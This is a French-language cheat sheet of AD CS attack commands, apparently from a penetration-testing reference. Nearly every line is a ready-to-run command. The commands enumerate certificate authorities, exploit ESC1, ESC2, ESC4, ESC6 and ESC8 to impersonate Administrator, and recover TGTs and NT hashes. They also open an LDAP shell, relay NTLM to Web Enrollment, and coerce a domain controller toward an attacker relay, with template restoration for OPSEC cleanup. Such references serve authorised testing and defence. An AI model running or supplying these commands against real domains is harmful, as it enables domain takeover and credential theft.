nxc ldap $DC -u $USER -p $PASS -M adcsDescription: Détecter la présence d'un CA et lister les Certificate Authorities du domaine.
ACL & GPO
Enumérer les CAs, exploiter les ESC paths et relayer NTLM vers le Web Enrollment.
nxc ldap $DC -u $USER -p $PASS -M adcsDescription: Détecter la présence d'un CA et lister les Certificate Authorities du domaine.
certipy find -u '$USER@$DOMAIN' -p $PASS -dc-ip $DC -vulnerableDescription: Lister uniquement les templates vulnérables avec leur chemin d'exploitation.
certipy find -u '$USER@$DOMAIN' -p $PASS -dc-ip $DC -stdoutDescription: Sortie lisible en terminal plutôt que JSON : bon pour un premier coup d'oeil.
gf ldap -t $DC -u $USER -p $PASS --adcsDescription: Détection rapide des misconfigs ADCS depuis GoFenrir.
certipy req -u '$USER@$DOMAIN' -p $PASS -ca $CA -template $TEMPLATE -upn administrator@$DOMAINDescription: ESC1 : usurper l'UPN d'Administrator dans le certificat si le template le permet.
certipy req -u '$USER@$DOMAIN' -p $PASS -ca $CA -template $TEMPLATE -dns $TARGET.$DOMAINDescription: ESC2 : utiliser le champ DNS SAN pour cibler une machine spécifique.
certipy auth -pfx administrator.pfx -dc-ip $DCDescription: Authentification avec le certificat : récupère TGT + NT hash d'Administrator.
certipy auth -pfx administrator.pfx -dc-ip $DC -ldap-shellDescription: Shell LDAP interactif post-auth certificat pour manipuler les objets AD directement.
certipy template -u '$USER@$DOMAIN' -p $PASS -template $TEMPLATE -save-oldDescription: ESC4 : sauvegarder la config du template avant modification pour pouvoir restaurer.
certipy template -u '$USER@$DOMAIN' -p $PASS -template $TEMPLATE -configuration $TEMPLATE_OLDDescription: Restaurer le template modifié après exploitation : nettoyage OPSEC.
certipy find -u '$USER@$DOMAIN' -p $PASS -dc-ip $DC -enabledDescription: ESC6 : chercher les templates avec EDITF_ATTRIBUTESUBJECTALTNAME2 activé sur la CA.
nxc smb $CIDR -u $USER -p $PASS --gen-relay-list relay.txtDescription: Identifier d'abord les hôtes sans SMB signing pour la coercition.
ntlmrelayx.py -t http://$CA/certsrv/certfnsh.asp --adcs --template $TEMPLATEDescription: ESC8 : relay NTLM directement vers le Web Enrollment du CA pour obtenir un certificat.
coercer coerce -u $USER -p $PASS -d $DOMAIN -t $DC -l $ATTACKER_IPDescription: Coercer le DC vers notre relay : son hash arrive dans ntlmrelayx.
certipy auth -pfx b64cert.pfx -dc-ip $DCDescription: Authentification avec le certificat capturé via relay : TGT + hash DC.